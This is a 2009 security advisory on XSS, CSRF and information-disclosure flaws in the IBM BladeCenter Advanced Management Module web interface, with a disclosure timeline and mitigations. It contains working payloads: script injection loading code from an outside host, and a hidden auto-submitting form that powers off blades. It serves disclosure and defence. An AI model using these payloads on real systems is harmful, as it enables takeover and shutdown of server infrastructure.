IBM BladeCenter Advanced Management Module Multiple vulnerabilities
Louhi Networks Information Security Research
Security Advisory
Advisory: IBM BladeCenter Advanced Management Module
Multiple vulnerabilities
(XSS type 2 & 1, CSRF, Information Disclosure)
Release Date: 2009-04-09
Last Modified: 2009-04-09
Authors: Henri Lindberg [henri.lindberg@xxxxxxxx], CISA
Device: IBM BladeCenter H AMM
Main application: BPET36H
Released: 03-20-08
Rev: 54
Risk: Low - Moderate
High if Web Access is in active use and
access to login page is unrestricted
Vendor Status: Vendor notified, patch available.
References: http://www.louhinetworks.fi/advisory/ibm_090409.txt
Affected devices (from vendor):
IBM BladeCenter E (1881, 7967, 8677)
IBM BladeCenter H (7989, 8852)
IBM BladeCenter HT (8740, 8750)
IBM BladeCenter S (1948, 8886)
IBM BladeCenter T (8720, 8730)
IBM BladeCenter JS12 (7998)
IBM BladeCenter JS21 (7988, 8844)
IBM BladeCenter JS22 (7998)
IBM BladeCenter HC10 (7996)
IBM BladeCenter HS12 (8014, 1916, 8028)
IBM BladeCenter HS20 (1883, 8843)
IBM BladeCenter HS21 (8853, 1885)
IBM BladeCenter HS21 XM (7995, 1915)
IBM BladeCenter LS20 (8850)
IBM BladeCenter LS21 (7971)
IBM BladeCenter LS41 (7972)
IBM BladeCenter QS21 (0792)
IBM BladeCenter QS22 (0793)
Overview:
Quotes from
http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html
"In today’s high-demand enterprise environment, organizations
need a reliable infrastructure to run compute-intensive
applications with minimal maintenance and downtime.
IBM BladeCenter H is a powerful platform built with the
enterprise customer in mind, providing industry-leading performance,
innovative architecture and a solid foundation for virtualization."
"Provides easy integration to promote innovation and help manage
growth, complexity and risk"
During a quick overview of BladeCenter AMM web access, it was
discovered that web administration interface has multiple
vulnerabilities regarding input and request validation.
Details:
Cross Site Scripting
====================
Type 2:
-------
Most serious issue discovered was the persistent XSS
vulnerability on the event log page resulting from
displaying unsanitized user input received from an invalid
login attempt.
This can be exploited without valid credentials or social
engineering. Access to device administration IP address is
needed and an administrator has to view event log at some point,
however.
Successful attack requires that an administrator visits event
log page, thus enabling the attacker to control the chassis
and blade configuration by running the injected content which
is interpreted by the administrator's browser.
For example, all blades can be shut down or new admnistrative
users can be added, depending on administrator's access rights.
Unsuccessful login attempts are displayed without HTML encoding
or input sanitation in the event log. It is possible to inject
a reference to a remote javascript file by using eg following
username:
</script><script src="//l7.fi"></script><script>
Notes:
If user input contains </script>, dynamic javascript is spilled
out on the page and it is quite easy to mess up formatting
of the event log page.
Log can be cleared by an authenticated administrator from URL:
http://1.2.3.4/private/clearlog
Event log javascript format:
parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit
","SN#420420313370","09/09/08","04:20:42","Remote login failed
for user '</script><script src='//l7.fi'></script><script>' from
Web at IP 1.2.3.4");
HTML-injection can be performed for example with following
"username": <a href="private/clearlog">Mallory</a>
This results in:
<TD>Remote login failed for user '<a href='private/clearlog'>
Mallory</a>' from Web at IP 1.2.3.4</TD>
Entries from event log are also displayed on the AMM Service
Data page.
Type 1:
-------
File manager displays user input on the page "as is".
Successful exploitation requires social engineering
an authenticated administrator to visit the hostile URL.
Example URL:
http://1.2.3.4/private/file_management.ssi?
PATH=/etc"><script%20src="http://l7.fi"></script>
Information Disclosure
======================
A readonly operator (for example, a Blade operator with
a scope assigment to one Blade) can view security
permissions of other users (access roles and scopes) by
forcefully browsing to their respective login profile pages:
http://1.2.3.4/private/login.ssi?WEBINDEX=<n>&JUNK=1
where <n> is the assigned integer value (1..12) of the user
account
Cross Site Request Forgery
==========================
BladeCenter AMM does not validate the origin of an HTTP request.
If attacker is able to lure or force an authenticated
administrator to view malicious content, the Advanced Management
Module web administration interface can be controlled by
submitting suitable forms. Attacker is then effectively acting
as an administrator.
Successful attack requires that the attacker knows the management
interface address for the target device.
As the management interface allows "No session timeout" option,
user can be vulnerable to this attack even after closing a tab
containing the management interface, if cached authentication
is not cleared from browser.
Proof of Concept:
-----------------
Example form (Powers off Blades 1-4):
<html>
<body onload="document.foobar.submit()">
<form name="foobar" method="post"
action="http://1.2.3.4/private/blade_power_action"
style="display:none">
<input name="COMMAND" value="6.3.2">
<input name="STATE" value="0">
<input name="CHECKED" value="15">
<input name="selall" value="on">
<input name="sel" value="bl1">
<input name="sel" value="bl2">
<input name="sel" value="bl3">
<input name="sel" value="bl4">
<input name="JUNK" value="1">
</form>
<body>
</html>
Summary:
Further research on BladeCenter AMM is strongly encouraged as
this brief overview touched only the surface of the device.
Management module supports a variety of networking protocols
and contains features also from Telco version. These can be
found by reading the commented HTML-code. One example feature is
http://1.2.3.4/private/get_telco_system_health_summary
It is also apparent that session timeout is not enforced.
More information:
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020
Mitigation:
* Do not use Web Access for configuring the chassis and blades.
* Limit access to web administration interface.
* Do not use "No session timeout" option.
* Always logout and close all browser windows after performing
administrative tasks.
* Do not browse untrusted sites while performing administrative
tasks
* Only grant access to web administration to trusted users
Disclosure Timeline (highlights from the eight month effort):
9. September 2008 - Contacted CERT-FI by email
22. October 2008 - Provided IBM with a clarification
why SSL usage does not fix CSRF
vulnerability
9. April 2009 - Advisory released
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or a hazard. If they're a benefit, it's not my problem."
-- Rick Deckard
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